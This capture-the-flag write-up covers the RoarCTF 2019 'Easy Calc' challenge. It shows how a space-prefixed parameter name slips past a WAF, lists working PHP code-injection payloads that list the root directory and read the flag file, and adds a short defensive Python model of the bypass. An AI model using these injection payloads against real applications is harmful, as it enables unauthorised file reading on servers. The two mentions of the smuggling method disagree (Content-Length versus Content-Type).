Challenge address: https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc
View the page source.
A packet capture reveals calc.php
Access http://node3.buuoj.cn:28908/calc.php
This is clearly a code-execution filter bypass. The page source viewed earlier also says there is a WAF. There are two ways to bypass the WAF.
- Add %20 before num to bypass the WAF's detection of num
- HTTP smuggling with a duplicate Content-Length header
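Why the %20 prefix gets past the WAF, shown from the defender's side as an added example (not code from the challenge or from the original write-up): the WAF matches the literal name num, while PHP drops leading spaces from parameter names before filling $_GET. The character allow-list for num and all function names are assumptions, and php_param_name is a simplified model of PHP's name handling.

```python
import re
from urllib.parse import unquote_plus

# Assumed WAF rule (not from the page): num may hold only calculator characters.
ALLOWED_NUM = re.compile(r"[0-9+\-*/().\s]*")

def raw_pairs(query):
    """Split a query string into URL-decoded (name, value) pairs, names kept verbatim."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def php_param_name(name):
    """Simplified model of PHP's handling of request variable names:
    drop leading spaces, stop at a NUL byte or '[' (array syntax),
    then turn remaining spaces and dots into underscores."""
    name = re.split(r"[\x00\[]", name.lstrip(" "), maxsplit=1)[0]
    return name.replace(" ", "_").replace(".", "_")

def naive_waf_allows(query):
    """Exact-name match: a parameter called ' num' is never inspected."""
    return all(ALLOWED_NUM.fullmatch(v) is not None
               for n, v in raw_pairs(query) if n == "num")

def hardened_waf_allows(query):
    """Normalize the name the way the backend will, then apply the same rule."""
    return all(ALLOWED_NUM.fullmatch(v) is not None
               for n, v in raw_pairs(query) if php_param_name(n) == "num")

if __name__ == "__main__":
    # Constructed sample queries; the second is the request shape used in this write-up.
    for q in ("num=1%2B2*3", "%20num=var_dump(scandir(chr(47)))", "num=phpinfo()"):
        print(q, naive_waf_allows(q), hardened_waf_allows(q))
```

The general fix is to make the filter and the backend agree on parameter names, or to validate num inside the application where the name has already been parsed.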
First look at phpinfo(): a lot of functions are disabled
Use the scandir() function together with the chr() function to bypass the code-execution filter
/calc.php?%20num=var_dump(scandir(chr(47)))
Or use the glob() function
/calc.php?%20num=var_dump(glob(chr(47).chr(42)))
f1agg is found in the root directory
Use file_get_contents() to read it
/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
Or other fancy file reading operations
/calc.php?%20num=show_source(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=print_r(php_strip_whitespace(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
.......
HTTP smuggling: bypassing the WAF with a repeated Content-Type